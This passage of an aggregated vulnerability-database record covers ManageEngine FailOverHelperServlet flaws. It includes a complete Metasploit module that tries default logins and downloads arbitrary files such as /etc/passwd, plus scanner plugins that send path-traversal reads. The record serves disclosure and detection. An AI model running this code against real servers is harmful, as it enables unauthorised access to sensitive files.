"LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/ADMIN/HTTP/MANAGEENGINE_FILE_DOWNLOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"ManageEngine Multiple Products Arbitrary File Download\",\n 'Description' => %q{\n This module 
exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-7863'],\n ['OSVDB', '117695'],\n ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/114'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']\n ],\n 'DisclosureDate' => '2015-01-28'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('TARGETURI', [true, \"The base path to OpManager, AppManager or IT360\", '/']),\n OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),\n OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),\n OptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),\n OptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),\n OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def get_cookie\n cookie = nil\n res = send_request_cgi({\n 
'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n })\n\n if res\n cookie = res.get_cookies\n end\n\n cookie\n end\n\n def detect_it360\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET'\n })\n\n if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/\n return true\n end\n\n return false\n end\n\n def get_it360_cookie_name\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n\n cookie = res.get_cookies\n\n if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/\n return $1\n else\n return nil\n end\n end\n\n def authenticate_it360(port, path, username, password)\n if datastore['DOMAIN_NAME'].nil?\n vars_post = {\n 'LOGIN_ID' => username,\n 'PASSWORD' => password,\n 'isADEnabled' => 'false'\n }\n else\n vars_post = {\n 'LOGIN_ID' => username,\n 'PASSWORD' => password,\n 'isADEnabled' => 'true',\n 'domainName' => datastore['DOMAIN_NAME']\n }\n end\n\n res = send_request_cgi({\n 'rport' => port,\n 'method' => 'POST',\n 'uri' => normalize_uri(path),\n 'vars_get' => {\n 'service' => 'OpManager',\n 'furl' => '/',\n 'timestamp' => Time.now.to_i\n },\n 'vars_post' => vars_post\n })\n\n if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/\n # /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/ -> this pattern is to avoid matching \"removed\"\n return res.get_cookies\n end\n\n nil\n end\n\n def login_it360\n # Do we already have a valid cookie? 
If yes, just return that.\n unless datastore['IAMAGENTTICKET'].nil?\n cookie_name = get_it360_cookie_name\n cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'\n return cookie\n end\n\n # get the correct path, host and port\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n\n if res && res.redirect?\n uri = [ res.redirection.port, res.redirection.path ]\n else\n return nil\n end\n\n if datastore['USERNAME'] && datastore['PASSWORD']\n print_status(\"Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...\")\n cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])\n unless cookie.nil?\n return cookie\n end\n end\n\n default_users = ['guest', 'administrator', 'admin']\n\n default_users.each do |user|\n print_status(\"Trying to authenticate as #{user}...\")\n cookie = authenticate_it360(uri[0], uri[1], user, user)\n unless cookie.nil?\n return cookie\n end\n end\n\n nil\n end\n\n def run\n # No point to continue if filepath is not specified\n if datastore['FILEPATH'].empty?\n print_error('Please supply the path of the file you want to download.')\n return\n end\n\n if detect_it360\n print_status(\"Detected IT360, attempting to login...\")\n cookie = login_it360\n if cookie.nil?\n print_error(\"Failed to login to IT360!\")\n return\n end\n else\n cookie = get_cookie\n end\n\n servlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'\n res = send_request_cgi({\n 'method' => 'GET',\n 'cookie' => cookie,\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\n })\n if res && res.code == 404\n servlet = 'FailOverHelperServlet'\n end\n\n # Create request\n begin\n print_status(\"Downloading file #{datastore['FILEPATH']}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => cookie,\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\n 'vars_get' => {\n 'operation' => 'copyfile',\n 'fileName' => 
datastore['FILEPATH']\n }\n })\n rescue Rex::ConnectionRefused\n print_error(\"Could not connect.\")\n return\n end\n\n # Show data if needed\n if res && res.code == 200\n\n if res.body.to_s.bytesize == 0\n print_error(\"0 bytes returned, file does not exist or is empty.\")\n return\n end\n\n vprint_line(res.body.to_s)\n fname = File.basename(datastore['FILEPATH'])\n\n path = store_loot(\n 'manageengine.http',\n 'application/octet-stream',\n datastore['RHOST'],\n res.body,\n fname\n )\n print_good(\"File saved in: #{path}\")\n else\n print_error(\"Failed to download file.\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/manageengine_file_download.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-08-19T12:45:57", "description": "The version of ManageEngine Applications Manager running on remote web server is affected by a file disclosure vulnerability due to a failure to properly sanitize user-supplied input to the 'fileName' parameter of the FailOverHelperServlet script. 
A remote, unauthenticated attacker, using a crafted request, can exploit this to view arbitrary files.", "cvss3": {"score": null, "vector": null}, "published": "2015-06-08T00:00:00", "type": "nessus", "title": "ManageEngine Applications Manager FailOverHelperServlet 'fileName' Parameter Arbitrary File Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7863"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:manageengine:applications_manager"], "id": "MANAGEENGINE_APPLICATIONS_MANAGER_11912_INFO_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/84017", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84017);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7863\");\n script_bugtraq_id(74402);\n\n script_name(english:\"ManageEngine Applications Manager FailOverHelperServlet 'fileName' Parameter Arbitrary File Disclosure\");\n script_summary(english:\"Attempts to read a local file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running an application that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine Applications Manager running on remote\nweb server is affected by a file disclosure vulnerability due to a\nfailure to properly sanitize user-supplied input to the 'fileName'\nparameter of the FailOverHelperServlet script. 
A remote,\nunauthenticated attacker, using a crafted request, can exploit this to\nview arbitrary files.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Jan/114\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.manageengine.com/products/applications_manager/issues.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Applications Manager version 11 Build 11912.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:manageengine:applications_manager\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_applications_manager_detect.nasl\");\n script_require_keys(\"installed_sw/ManageEngine Applications Manager\");\n script_require_ports(\"Services/www\", 9090);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine Applications Manager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:9090);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\n# Establish a session first\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir,\n exit_on_fail : TRUE\n);\n\ndir = dir - \"/index.do\";\nurl = \"/servlet/FailOverHelperServlet?operation=copyfile&fileName=\";\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os)\n files = make_list('/windows/win.ini','/winnt/win.ini');\n else\n files = make_list('/etc/passwd');\n}\nelse files = make_list('/etc/passwd', '/windows/win.ini', '/winnt/win.ini');\n\nfile_pats = make_array();\nfile_pats['/etc/passwd'] = \"root:.*:0:[01]:\";\nfile_pats['/winnt/win.ini'] = \"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\";\nfile_pats['/windows/win.ini'] = \"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\";\n\nvuln = FALSE;\n\nforeach file (files)\n{\n res = http_send_recv3(\n method : \"POST\",\n port : port,\n item : dir + url + file,\n data : '',\n exit_on_fail : TRUE\n );\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n vuln = TRUE;\n break;\n }\n}\nif (!vuln)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n file : file,\n request : make_list(http_last_sent_request()),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n);\nexit(0);\n", "cvss": 
{"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:46:37", "description": "An information disclosure vulnerability exists in ManageEngine OpManager, Applications Manager and IT360. The vulnerability is due to lack of authentication and insufficient input validation of the a parameter sent to FailOverHelperServlet in HTTP requests. A remote unauthenticated attacker can leverage this vulnerability by sending malicious HTTP requests to the server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2015-03-02T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FailOverHelperServlet copyfile Information Disclosure (CVE-2014-7863)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2015-10-22T00:00:00", "id": "CPAI-2015-0206", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdi": [{"lastseen": "2022-01-31T21:14:20", "description": "This vulnerability allows remote attackers to disclose files on vulnerable installations of ManageEngine Applications Manager. 
Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the FailOverHelperServlet servlet. The issue lies in the failure to properly sanitize a filename. A remote attacker can exploit this vulnerability to disclose files from the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2015-04-29T00:00:00", "type": "zdi", "title": "ManageEngine Applications Manager FailOverHelperServlet Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2015-04-29T00:00:00", "id": "ZDI-15-162", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-162/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T14:51:21", "description": "The FailOverHelperServlet (aka FailServlet) servlet in ZOHO ManageEngine Applications Manager before 11.9 build 11912, OpManager 8 through 11.5 build 11400, and IT360 10.5 and earlier does not properly restrict access, which allows remote attackers and remote authenticated users to (1) read arbitrary files via the fileName 
parameter in a copyfile operation or (2) obtain sensitive information via a directory listing in a listdirectory operation to servlet/FailOverHelperServlet.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-08T17:15:00", "type": "cve", "title": "CVE-2014-7863", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2020-02-13T16:30:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.5", "cpe:/a:zohocorp:manageengine_it360:10.5", "cpe:/a:zohocorp:manageengine_applications_manager:11.9"], "id": "CVE-2014-7863", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7863", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_it360:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_applications_manager:11.9:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.5:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:51:23", "description": "Multiple SQL injection vulnerabilities in the FailOverHelperServlet (aka FailServlet) servlet in ZOHO ManageEngine OpManager 8 through 11.5 build 11400 and 
IT360 10.5 and earlier allow remote attackers and remote authenticated users to execute arbitrary SQL commands via the (1) customerName or (2) serverRole parameter in a standbyUpdateInCentral operation to servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.", "cvss3": {}, "published": "2015-02-04T16:59:00", "type": "cve", "title": "CVE-2014-7864", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7864"], "modified": "2018-10-09T19:53:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:9.1", "cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:10.1", "cpe:/a:zohocorp:manageengine_opmanager:11.1", "cpe:/a:zohocorp:manageengine_opmanager:9.2", "cpe:/a:zohocorp:manageengine_opmanager:10.2", "cpe:/a:zohocorp:manageengine_opmanager:11.0", "cpe:/a:zohocorp:manageengine_opmanager:11.5", "cpe:/a:zohocorp:manageengine_opmanager:11.2", "cpe:/a:zohocorp:manageengine_opmanager:8.8", "cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_opmanager:9.4", "cpe:/a:zohocorp:manageengine_opmanager:9.0", "cpe:/a:zohocorp:manageengine_opmanager:10.0"], "id": "CVE-2014-7864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7864", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_opmanager:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:8.8:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-04-16T16:51:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7864"], "description": "This host is installed with ZOHO ManageEngine\n OpManager and is prone to multiple vulnerabilities.", "modified": "2020-04-09T00:00:00", "published": "2015-03-20T00:00:00", "id": "OPENVAS:1361412562310805473", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805473", "type": "openvas", "title": "ZOHO ManageEngine OpManager Multiple Vulnerabilities - Feb15", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZOHO ManageEngine OpManager Multiple Vulnerabilities - Feb15\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_opmanager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805473\");\n script_version(\"2020-04-09T12:09:29+0000\");\n script_cve_id(\"CVE-2014-7864\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-09 12:09:29 +0000 (Thu, 09 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-03-20 11:53:55 +0530 (Fri, 20 Mar 2015)\");\n script_name(\"ZOHO ManageEngine OpManager Multiple Vulnerabilities - Feb15\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ZOHO ManageEngine\n OpManager and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to read a local file via a crafted HTTP POST request\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to multiple SQL injection, Local file include and File overwrite\n vulnerabilities in the FailOverHelperServlet (aka FailServlet) servlet in ZOHO ManageEngine OpManager.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n remote attackers and remote authenticated users to execute arbitrary SQL\n commands via the (1) customerName or (2) serverRole parameter in a\n standbyUpdateInCentral operation or to read/overwrite arbitrary files to\n servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.\");\n\n script_tag(name:\"affected\", value:\"ZOHO ManageEngine OpManager\n versions 8 through 11.5 build 11400\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 11.6 or install 
the\n patch for v11.4 and 11.5 bilities-in-failoverhelperservlet\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130162\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/534575/100/0/threaded\");\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservle\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_manage_engine_opmanager_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"manageengine/opmanager/http/detected\");\n script_require_ports(\"Services/www\", 8080);\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnera\");\n script_xref(name:\"URL\", value:\"http://www.manageengine.com\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! 
port = get_app_port( cpe:CPE ) ) exit(0);\n\nurl = '/';\nreq = http_get( item:url, port:port );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\nif( \"Set-Cookie\" >!< buf )\n{\n url = '/LoginPage.do';\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n if( \"Set-Cookie\" >!< buf ) exit( 0 );\n}\n\nco = eregmatch( pattern:'Set-Cookie: ([^\\r\\n]+)', string:buf );\nif( isnull( co[1] ) ) exit( 0 );\n\ncookie = co[1];\n\nservlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet';\nurl = '/servlet/' + servlet;\n\nreq = http_get_req( port:port, url:url, add_headers:make_array( \"Cookie\", cookie ) );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( \"HTTP/1\\.. 404\" >< buf ) servlet = 'FailOverHelperServlet';\n\nfiles = traversal_files();\n\nforeach file ( keys( files ) )\n{\n if( files[file] == 'etc/passwd' )\n traversal = '/../../../../../../../../../../../../../';\n else\n traversal = '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\\\\';\n\n url = '/servlet/' + servlet + '?operation=copyfile&fileName=' + traversal + files[file];\n\n req = http_post_put_req( port:port, url:url, data:NULL, add_headers: make_array( \"Cookie\", cookie ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:file, string:res ) )\n {\n report = 'By sending the request\\n\\n' + req + 'it was possible to read the file ' + files[file] + ' on the remote Host.\\n\\nResponse:\\n\\n' + res + '\\n';\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}